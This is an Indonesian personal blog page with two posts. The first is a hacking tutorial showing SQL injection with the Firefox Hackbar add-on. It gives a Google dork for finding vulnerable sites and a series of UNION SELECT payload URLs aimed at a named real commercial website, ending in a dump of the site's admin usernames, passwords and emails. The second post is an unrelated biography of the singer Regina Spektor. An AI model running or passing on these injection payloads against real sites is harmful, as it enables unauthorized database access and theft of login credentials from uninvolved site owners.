[Tutor] SQLi dengan Hackbar


Haloooo brother, postingan gue kali ini agak beda soalnya postingan kali ini membahas tentang hacking. Ok teknik yang gue gunakan kali ini adalah SQL Injection, mungkin kalo SQL Injection ga usah gue jelasin lagi karena di google pun banyak artikel tentang 'apa itu SQL Injection'. Nah gue jelasin sedikit dulu apa itu 'Hackbar', hackbar adalah sebuah addons milik mozila firefox yang fungsinya sangat banyak khususnya programming web sebenarnya fungsi hackbar sendiri adalah untuk menguji sistem SQL Injection atau XSS Attack bisa juga untuk mengenkripsi password MD5 dan SHA-1. Untuk mendownload hackbar bisa lo klik link berikut:

OK Kalo hackbar udah terinstal sekarang kita mulai aja, pertama tama lo buka browser mozila Firefox kalo udah langsung buka lagi http://www.google.com

Kalo si mbah google udah kebuka langsung masukin dork nya di google search, nah dork yang kali ini gue pake adalah "allinurl: /product.php?id= site:my" tanpa tanda petik. 
Dan contoh website yang saya pakai adalah : 

Nah untuk mengetahui web tersebut vuln SQLi atau engga caranya kita test URL dengan menambahkan tanda petik ( ' ) di belakang angka, contoh:

Dan hasil yang kita dapat adalah :

Terlihat bahwa website tersebut vuln SQLi
Selanjutnya adalah mengetahui jumlah table di databasenya dengan perintah "Order by"

misalnya :  

http://www.webeauty.com.my/english/product.php?id=1 order by 1--   <====no error
http://www.webeauty.com.my/english/product.php?id=1 order by 2--   <====ERROR

lihat contoh diatas, kali ini gue beruntung karena gue langsung dapet error di order by yang ke 2 saja (biasanya sampe belasan bahkan puluhan dan menurut gue ini step yang paling ngebosenin), kesimpulannya adalah berarti jumlah kolom database web tersebut itu ada 1. Kenapa bisa satu ? karena kita bisa menghitung yang no error saja, jadi misalnya jika error nya di order by 6 jumlah kolomnya adalah 5 (gampangnya jika order by sudah ketemu error di kurang 1). Gue harap sampe sini lo ngerti.

langkah selanjutnya adalah mengetahui dimana angka angka yang bisa dibuat injection atau tempat kita memasukan perintah selanjutnya. Cara mengetahui angkanya adalah dengan mengganti perintah Order by dengan perintah Union Select serta menambahkan tanda strip (-) di depan angka atau sesudah tanda (=).


maka hasilnya :
Terlihat dari gambar diatas, Angkanya adalah 1
Nah angka 1 itulah yang nantinya berguna untuk memasukan perintah selanjutnya, Sekarang adalah tahap untuk mengetahui Versi databasenya. Cara mengetahuinya adalah dengan memasukan perintah "@@version" atau "version()" kedalam angka yang muncul tadi.
Contoh : http://www.webeauty.com.my/english/product.php?id=-1 union select 1--   << angka 1 nya diganti sehingga menjadi http://www.webeauty.com.my/english/product.php?id=-1 union select @@version--  kalau sudah langsung tekan Enter, dan hasilnya :

terlihat versinya adalah 5.5.16

Nah dari gambar tersebut terlihat versinya adalah 5.5.16 itu berarti kita beruntung, karena jika kita dapat versi 4 maka kita akan agak kerepotan karena harus menebak 1 per 1 tabel yang ada dalam database tersebut sehingga secara otomatis perintah SQL nya pun berbeda.

Tahap Selanjutnya adalah mengetahui nama table table yang ada di web tersebut, caranya adalah memang agak rumit bagi yang belum terbiasa yaitu dengan mengganti perintah "@@version" dengan perintah "group_concat(table_name) dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir atau sebelum tanda -- .  
Contoh: 
http://www.webeauty.com.my/english/product.php?id=-1unionselect group_concat(table_name) from information_schema.tables where table_schema=database()-- <<<MOHON MAAF PERINTAH UNION SELECT NYA SAYA GABUNG KARENA TAKUT TIDAK MUAT, JADI TINGGAL DIKASIH SPASI AJA.

kalau sudah tekan enter, dan hasilnya :


Nahhhh muncul juga deh tabel Admin nya, tahap selanjutnya kita akan menggunakan Hackbar
kalo ditahap ini fungsi hackbar adalah untuk mengetahui kolom pada sebuah tabel. OK kita mulai, di address bar lo copy paste link yang terakhir ( itu tuh yang baru di edit buat ngeliat isi tabel) ke tempat hackbar berada, agak susah jelasinnya jadi gue kasih gambarnya aja :

Masih belum dirubah

Sesudah diubah

Ok disini gue kasih penjelasan sedikit, untuk mengetahui kolom dalam suatu tabel dengan cara ini adalah dengan mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" serta ganti perintah "table_schema=database()" dengan perintah "table_name=". Dan di-ikuti hasil Convert My SQL, ikuti langkah ini sesuai gambar: 


maka nanti akan keluar JavaScript Application seperti gambar di bawah ini


Masukan nama tabelnya, contoh 'admin'. Yang wajib lo ketahui, sebelum kita convert MySQL sebaiknya kursor di klik dulu ke 'sesudah table_name=' atau sebelum '--' contoh gambarnya bisa dilihat di atas yang "SESUDAH DIUBAH" keterangannya.

Hasilnya :

terlihat, sesudah '=' muncul CHAR hasil convert tadi
Setelah itu tekan Execute, dan lihat hasilnya :

Muncul deh Kolomnya

Langkah terakhir adalah mengetahui data data yang ada dalam kolom tersebut caranya dengan mengganti Column_name yang ada dalam perintah group_concat, misalnya : group_concat(column_name) nah yang didalam kurung itu yang diubah. Ubah dengan kolom yang kita temukan tadi.

Contoh: group_concat(ad_username,0x3a,ad_password,0x3a,ad_email) <<< jangan lupa gunakan '0x3a' . 

sebenarnya kolom yang di dapat ada banyak, tapi gue pake 3 aja karena itu kolom yang vital menurut gue. Terserah lo juga mau pake semuanya juga bisa, dalam dunia hacking kita dituntut untuk memainkan kreativitas kita. setelah itu kita ubah perintah "from information_schema. columns where table_name=CHAR(97, 100, 109, 105, 110)-- " dengan "from admin--".
gue jelasin sedikit, jadi admin yang gue warnain merah itu adalah nama tabel nya, jadi perintah tersebut tergantung nama tabelnya. Jadi kalo misalnya nama tabelnya itu 'administrator' berarti lo tulis perintahnya "from administrator--"

Contoh:
http://www.webeauty.com.my/english/product.php?id=-1 union select group_concat(ad_username,0x3a,ad_password,0x3a,ad_email) from admin--

kalo masih kurang jelas bisa liat gambar dibawah ini :

setelah itu tekan execute *ralat bro, itu ad_password

Setelah lo tekan execute, maka hasilnya adalah : tadaaaaa



MUNGKIN CUKUP SEKIAN TUTORIAL DARI GUE, MOHON MAAF BILA ADA KATA KATA YANG SALAH JADI MOHON DI KOREKSI. JIKA ADA YANG MASIH BELUM PAHAM LO BISA BERTANYA DENGAN CARA "BERKOMENTAR"

'hacker bukan perusak'

Tuesday, 9 April 2013
Posted by Arief Budiman
Tag :

[Bio] Regina Spektor



Regina Spektor, Lahir pada 18 Februari 1980 di Moscow, Russia. penyanyi solo yang suaranya aselole menurut gue, Genre music yang dia mainkan bermacam macam, mulai dari Anti-folk (anti folk bisa lo artiin sendiri di google translate) , Alternative, Indie rock, Acoustic, Blues. Pekerjaannya pun sama kayak genre music yang dia mainkan (bermacam macam) selain penyanyi dia juga bekerja sebagai penulis lagu dan produser rekaman, yang bikin gue suka dari dia itu mungkin main music dan suara unik nya itu loh.

Kalo main music sih dia bisa main piano sama gitar dan tipe suaranya hanya mezzo-sopran, tapi lo wajib denger full lagu favorite gue yang judulnya "the call" sampe abis. Mungkin sebagian sudah tau dan sebagian juga belum, lagu "the call" itu adalah lagu yang pernah dijadiin soudtrack film Narnia 2 'the prince of caspian', sebenernya sih bukan kategori soundtrack tapi pokoknya ada di film itu deh, mungkin lo bertanya tanya mana lagunya pas di film itu ? nah disitu munculnya pas endingnya (terakhir), tau kan ? pas si peter, edward, susan, lucy mau pulang lewat pohon, disitu tuh lagunya muncul (sorry agak OOT). Dan ga cuma lagu "the call" doang yang pernah dijadiin soundtrack film, tapi lagu yang judulnya "us" juga pernah dijadiin soundtrack di film '500 Day of Summer'. 



Selanjutnya tentang kisah hidup, simak baik baik yah 'Seorang veteran New York anti-folk, Regina Spektor membuat musik yang lincah, sangat bersemangat, tetapi selalu personal. Lahir dan dibesarkan di Moskow sampai umur 9 tahun, Regina Spektor selalu mendengarkan kaset  kaset pop dan rock barat milik ayahnya, dan juga belajar bermain piano. Dia dan keluarganya pindah dari Rusia ke Bronx, dimana ia bergabung dengan budaya amerika (pada masa itu, Keluarganya adalah keluarga Rusia yang pertama yang datang dalam 20 tahun terakhir.) 

Selanjutnya, Spektor dan keluarganya menjadi bagian dari komunitas yang menyeimbangkan budaya Jewish(yahudi)-rusia dengan dengan budaya amerika. dia melanjutkan berlati piano dimanapun ia bisa, termasuk di synagoga (tempat Jewish beribadah), sampai keluarganya akhirnya punya piano sendiri. Spektor terus mengembangkan piano klasikal yang dipelajarinya dengan mengikuti SUNY Purchase Music Conservatory. selama masa pembelajarananya, dia mengikuti pemusik Blues dan Jazz, seperti Billie Holiday, dan untuk pertama kalinya, musik ini berpengaruh sangat besar untuk Spektor sampai - sampai musik ini menjadi bagian besar dalam album yang ia keluarkan sendiri (self-released) tahun 2001, 11:11. 



Pada waktu yang sama, di juga bermain dimanapun ia bisa di kotanya, dari ruang bawah tanah hingga pesta - pesta di comedy klub (semacam tempat orang2 have fun, tapi dari lawakan, bukan clubbing). dengan penampilannya yang cukup sering dan keluarnya album barunya, lagu - lagu 2002 Spektor mengembangkan sesuatu yang baru dan hal itu termasuk Alan Bezozi, drummer dari 'They Might Be Giants' dia mengenalkan Spektor kepada produser Strokes, Gordon Raphael. Raphael dan Bezozi bekerja sama dengan Spektor di album ketiga Regina, Soviet Kitsch, di New York dan London (dimana regina berkolaborasi dengan band Kill Kenada). Soviet Kitsch dirilis seperti album - album sebelumnya, ia rilis sendiri. tetapi itu akirnya ditemukan dan akhirnya dirilis secara meluas oleh Sire Records. 

Tur dengan the Strokes, Kings of Leon, Mates of State, dan the Moldy Peaches' Kimya Dawson lebih meningkatkan popularitas Spektor . turnya di UK dan suksesnya single "us" memulai rilisnya CD/DD retrospective Mary Ann Meets the Gravediggers dan Other Short Stories awal 2006; musim panas itu, Begin to Hope, adalah album pertamanya bagi Sire Records. [diambil dari : Heather Phares, All Music Guide.]' (maapin kalo terjemahannya ancur, maklum cuma di google translate) kalo mau yang lebih lengkap bisa lo akses di wikipedia, ada di bagian paling bawah linknya.

Ok bro, cukup segini dulu tentang Regina Spektor, maaf banget karena gue belum sempet ngasih detail tentang Regina Spektor, Soal lagu lagunya nanti gue share lagi deh biar lo semua ga kecewa :). satu lagi, maapin kalo ada salah salah kata dari gue kalo gitu sampai ketemu di artikel selanjutnya :D.

Referensi : http://forum.indowebster.com/archive/index.php/t-11270.html,
google.co.id, http://en.wikipedia.org/wiki/Regina_Spektor, and other
Sunday, 24 March 2013
Posted by Arief Budiman
Tag :

Followers

- Copyright © Just Aji -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -